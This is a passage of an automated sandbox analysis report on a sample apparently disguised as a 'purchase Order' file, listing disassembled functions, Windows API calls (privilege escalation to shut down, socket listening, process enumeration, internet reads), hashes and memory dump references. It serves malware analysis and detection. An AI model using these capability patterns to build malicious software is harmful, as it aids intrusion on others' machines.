                                                        • Opcode Fuzzy Hash: 209bca401922bc99cd15c92965a76214ec7e428540fe428c57cd509c46c6e9af
                                                        • Instruction Fuzzy Hash: 86910771D00218ABDF10DF94DC95EEEBBB8FF08710F10816AE919A7291DB709A45DFA0
                                                        APIs
                                                          • Part of subcall function 00C7B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C7B180
                                                          • Part of subcall function 00C7B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C7B1AD
                                                          • Part of subcall function 00C7B134: GetLastError.KERNEL32 ref: 00C7B1BA
                                                        • ExitWindowsEx.USER32(?,00000000), ref: 00C87A0F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                        • String ID: $@$SeShutdownPrivilege
                                                        • API String ID: 2234035333-194228
                                                        • Opcode ID: d46a0c5de524acc62e4fbf11be2545ef733bf4415795363c457e72bf56145a0f
                                                        • Instruction ID: 342c8221c4ed12f7bf350a70c4f4fe1a1ea2ff5d4a0e82cd53ffa2c1d7969e16
                                                        • Opcode Fuzzy Hash: d46a0c5de524acc62e4fbf11be2545ef733bf4415795363c457e72bf56145a0f
                                                        • Instruction Fuzzy Hash: E301D8716582116AE72C3664CC8AFFF32589B00348F341624F913A20C1F560DF00A3B8
                                                        APIs
                                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00C98CA8
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00C98CB7
                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00C98CD3
                                                        • listen.WSOCK32(00000000,00000005), ref: 00C98CE2
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00C98CFC
                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00C98D10
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$bindclosesocketlistensocket
                                                        • String ID:
                                                        • API String ID: 1279440585-0
                                                        • Opcode ID: 5de8bf3fcad472efc50003d1ac99deb0d19f898742fb590542ffcd07478a732b
                                                        • Instruction ID: c4114381c8e18de036eddd57087bc73fe848cfac2d7c5f1db95918223ad0e961
                                                        • Opcode Fuzzy Hash: 5de8bf3fcad472efc50003d1ac99deb0d19f898742fb590542ffcd07478a732b
                                                        • Instruction Fuzzy Hash: 0821EF316002019FCB10EF68C889F6EB7E9EF4A724F108558F957A72D2CB70AE45DB65
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00C86554
                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00C86564
                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 00C86583
                                                        • __wsplitpath.LIBCMT ref: 00C865A7
                                                        • _wcscat.LIBCMT ref: 00C865BA
                                                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00C865F9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                        • String ID:
                                                        • API String ID: 1605983538-0
                                                        • Opcode ID: dcf0fc5556dd6dd3d6b2233e568eafc09fb6908de5a94587f834329dba506dfc
                                                        • Instruction ID: a9871debb231c7f47b1a2cfecd64fe0a418c0c2f7845d43299ac1581ee12450a
                                                        • Opcode Fuzzy Hash: dcf0fc5556dd6dd3d6b2233e568eafc09fb6908de5a94587f834329dba506dfc
                                                        • Instruction Fuzzy Hash: 95219F71900219ABDB20BFA4CC88FEEBBBCAB48314F5000A9E505E7141EB719F85CB60
                                                        APIs
                                                          • Part of subcall function 00C9A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00C9A84E
                                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00C99296
                                                        • WSAGetLastError.WSOCK32(00000000,00000000), ref: 00C992B9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastinet_addrsocket
                                                        • String ID:
                                                        • API String ID: 4170576061-0
                                                        • Opcode ID: 4158ed88069e590c99abe68311b0aeb1adb5cc9986452d0a7952b2c6a6a48fbf
                                                        • Instruction ID: c003fe840349461bb3150864e44a905277595c4fd222065f61b4903d2042b42d
                                                        • Opcode Fuzzy Hash: 4158ed88069e590c99abe68311b0aeb1adb5cc9986452d0a7952b2c6a6a48fbf
                                                        • Instruction Fuzzy Hash: 8F41CC70600200AFEB10AF68C886F7E77EDEF44724F04845CF956AB2D2CA74AE419B95
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00C8EB8A
                                                        • _wcscmp.LIBCMT ref: 00C8EBBA
                                                        • _wcscmp.LIBCMT ref: 00C8EBCF
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00C8EBE0
                                                        • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00C8EC0E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Find$File_wcscmp$CloseFirstNext
                                                        • String ID:
                                                        • API String ID: 2387731787-0
                                                        • Opcode ID: 519606e2a302b4aaf42b053241db7ece3843052496a26c03e676885b60c3f3bb
                                                        • Instruction ID: dc95791046b2bbe8539bc00c63f1a4e766df7e43268e1009571d2935b2bd6ac6
                                                        • Opcode Fuzzy Hash: 519606e2a302b4aaf42b053241db7ece3843052496a26c03e676885b60c3f3bb
                                                        • Instruction Fuzzy Hash: 1B41C0356043019FC718EF28C490EAAB3E4FF4A328F10455DE96A8B3A1DB31F945CB59
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                        • String ID:
                                                        • API String ID: 292994002-0
                                                        • Opcode ID: 5ad5c207e8d9f9b427203991ba006068353e8677792486f1cbbc391e75594167
                                                        • Instruction ID: 460180ad7e4a7301ef6deace1f97eb6d9dadd64eba89c09a0cf9f01091523543
                                                        • Opcode Fuzzy Hash: 5ad5c207e8d9f9b427203991ba006068353e8677792486f1cbbc391e75594167
                                                        • Instruction Fuzzy Hash: D011E7317001126FE7216F26DC84F6FBB9CEF46764B044429FA5AD7241CF30E94786A4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                        • API String ID: 0-1546025612
                                                        • Opcode ID: f7fc5dd977809a670aaf1e7a8c2c1967aba19d0a7dc1ec7252f8a43502c6c73f
                                                        • Instruction ID: 5d45479c11767900120a256c4c638d9eca26afb3b7490ca95feab1dbe06f400d
                                                        • Opcode Fuzzy Hash: f7fc5dd977809a670aaf1e7a8c2c1967aba19d0a7dc1ec7252f8a43502c6c73f
                                                        • Instruction Fuzzy Hash: 86927271E0022ACBDF24CF99C881BBEB7B1FB54314F14819AD82AA7280D7759E85DF51
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00C5E014,76F90AE0,00C5DEF1,00CDDC38,?,?), ref: 00C5E02C
                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00C5E03E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                                        • API String ID: 2574300362-192647395
                                                        • Opcode ID: 33e815c48ec12f396cae1c42114bb0c6d7c6bf004ec745bf268b46df5783772d
                                                        • Instruction ID: 7fce2d6fb37692995b0d767c664c4349f6ecaa29f40769b2cbc11cdb6c17b18c
                                                        • Opcode Fuzzy Hash: 33e815c48ec12f396cae1c42114bb0c6d7c6bf004ec745bf268b46df5783772d
                                                        • Instruction Fuzzy Hash: 82D0A7358007129FC7354F60EC08B7A76D4AB00312F2C4439E892D2190D7B4C9C48650
                                                        APIs
                                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00C813DC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: lstrlen
                                                        • String ID: ($|
                                                        • API String ID: 1659193697-1631851259
                                                        • Opcode ID: dd42fd229e72d2915a32ad6e3fa58d0a7db247b158e78ef2602d59760251e173
                                                        • Instruction ID: a47fc054373d65e0672862200787242638389cef03c4745701861d2e25aea6c4
                                                        • Opcode Fuzzy Hash: dd42fd229e72d2915a32ad6e3fa58d0a7db247b158e78ef2602d59760251e173
                                                        • Instruction Fuzzy Hash: 71324875A007059FC728DF69C48096AB7F4FF48324B15C46EE9AADB3A1D770E982CB44
                                                        APIs
                                                          • Part of subcall function 00C5B34E: GetWindowLongW.USER32(?,000000EB), ref: 00C5B35F
                                                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 00C5B22F
                                                          • Part of subcall function 00C5B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00C5B5A5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Proc$LongWindow
                                                        • String ID:
                                                        • API String ID: 2749884682-0
                                                        • Opcode ID: 88dddfb0f841319e2219a6b5eb420ce3374aace12beffb52b24ee1851b00a366
                                                        • Instruction ID: 9e0e6f545c6413355dd408d20e9752a46474d4a2cda3d835e720c147155c393a
                                                        • Opcode Fuzzy Hash: 88dddfb0f841319e2219a6b5eb420ce3374aace12beffb52b24ee1851b00a366
                                                        • Instruction Fuzzy Hash: 83A176B8114105BADB386B6B8C89EFF6D6CEF42747F10411DFC12D2191CB249E89E67A
                                                        APIs
                                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00C943BF,00000000), ref: 00C94FA6
                                                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00C94FD2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Internet$AvailableDataFileQueryRead
                                                        • String ID:
                                                        • API String ID: 599397726-0
                                                        • Opcode ID: 4190563a30cbc96f58e92e15076ea54d096770857880df4d66764cc4f900610c
                                                        • Instruction ID: b0ce66ab51b2bfebefb9155f36eafa58ea331e56ce49f8b3cb1103c8e61c70c0
                                                        • Opcode Fuzzy Hash: 4190563a30cbc96f58e92e15076ea54d096770857880df4d66764cc4f900610c
                                                        • Instruction Fuzzy Hash: 9741E47150460ABFEF259F91CC89EBFB7ACEB40718F10006EF605A6181EA719F4297A0
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 00C8E20D
                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00C8E267
                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00C8E2B4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$DiskFreeSpace
                                                        • String ID:
                                                        • API String ID: 1682464887-0
                                                        • Opcode ID: d9d1a7a36b08464e18cf252185940b35cceaaa9a4d819826d9f2ace95f0fa3d3
                                                        • Instruction ID: 8a579d14397ad04cb6ebbf939c0f8a4901092e6def76277043f97a6a26d186ff
                                                        • Opcode Fuzzy Hash: d9d1a7a36b08464e18cf252185940b35cceaaa9a4d819826d9f2ace95f0fa3d3
                                                        • Instruction Fuzzy Hash: 4C215C35A00118EFDB00EFA5D884EAEBBB8FF49314F0584A9E946AB251DB31A945CB54
                                                        APIs
                                                          • Part of subcall function 00C5F4EA: std::exception::exception.LIBCMT ref: 00C5F51E
                                                          • Part of subcall function 00C5F4EA: __CxxThrowException@8.LIBCMT ref: 00C5F533
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C7B180
                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C7B1AD
                                                        • GetLastError.KERNEL32 ref: 00C7B1BA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                        • String ID:
                                                        • API String ID: 1922334811-0
                                                        • Opcode ID: 49c3b63e3229ae44f9f46a0c42136a5d06336ffeebd0f2d2236d41fdd2a7502b
                                                        • Instruction ID: 57d0c4bb19bfb57bf8d169e3e765f92b33299a086ad485a2100a9124c6dc1bdb
                                                        • Opcode Fuzzy Hash: 49c3b63e3229ae44f9f46a0c42136a5d06336ffeebd0f2d2236d41fdd2a7502b
                                                        • Instruction Fuzzy Hash: 2D11C1B2400204AFE7189F64DCC5E2FB7BCFB44311B20C52EE45A93240DB70FC428A60
                                                        APIs
                                                        • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00C866AF
                                                        • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 00C866EC
                                                        • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00C866F5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: CloseControlCreateDeviceFileHandle
                                                        • String ID:
                                                        • API String ID: 33631002-0
                                                        • Opcode ID: 5c75f3d2e55ccd9b3814059d20dd9914d9b036f845690bb1bc43156ad5e5eaa2
                                                        • Instruction ID: 223226396c0312465b0baa0d65da6d65f41a10cdd14f4484afe48796310fc989
                                                        • Opcode Fuzzy Hash: 5c75f3d2e55ccd9b3814059d20dd9914d9b036f845690bb1bc43156ad5e5eaa2
                                                        • Instruction Fuzzy Hash: 2A11C8B1901228BFE7109BA8DC45FAF77BCEB04718F004556F911E7191D274AE0487E5
                                                        APIs
                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00C87223
                                                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00C8723A
                                                        • FreeSid.ADVAPI32(?), ref: 00C8724A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                        • String ID:
                                                        • API String ID: 3429775523-0
                                                        • Opcode ID: fcd1fb0b57af1dfb9f8238e63069a118a7a781a4344ef4e065501a61d9276d05
                                                        • Instruction ID: ac621e95a28378be488fde59d3dceb9d05e158e66769b1f16851a649b0dd7c37
                                                        • Opcode Fuzzy Hash: fcd1fb0b57af1dfb9f8238e63069a118a7a781a4344ef4e065501a61d9276d05
                                                        • Instruction Fuzzy Hash: 97F0F976A04209BBDB04DBE8DD89FAEBBB8EB08205F104469E602E2191E2709A458B14
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00C8F599
                                                        • FindClose.KERNEL32(00000000), ref: 00C8F5C9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Find$CloseFileFirst
                                                        • String ID:
                                                        • API String ID: 2295610775-0
                                                        • Opcode ID: 99732219b9ea21c57622007cd21cdad3afb59d36872bde093558ad10b71a4d66
                                                        • Instruction ID: 6642ff5028ee3288877206cac493c50fa4675549f225ae48797baaf943f1c340
                                                        • Opcode Fuzzy Hash: 99732219b9ea21c57622007cd21cdad3afb59d36872bde093558ad10b71a4d66
                                                        • Instruction Fuzzy Hash: D411C4316002009FD710EF29D845A2EB3E8FF85325F04892EF8A6D7291CB34BD058B85
                                                        APIs
                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00C9BE6A,?,?,00000000,?), ref: 00C8CEA7
                                                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00C9BE6A,?,?,00000000,?), ref: 00C8CEB9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: ErrorFormatLastMessage
                                                        • String ID:
                                                        • API String ID: 3479602957-0
                                                        • Opcode ID: e9f637965fd8cbe18a0c4179bf4a2ecc7960294a55cb95bfa60557a3d9b1b89c
                                                        • Instruction ID: 6bbe98e4d721a7b5156547a7671939e583ab6ff36c8d000619a6be28b35a5b1d
                                                        • Opcode Fuzzy Hash: e9f637965fd8cbe18a0c4179bf4a2ecc7960294a55cb95bfa60557a3d9b1b89c
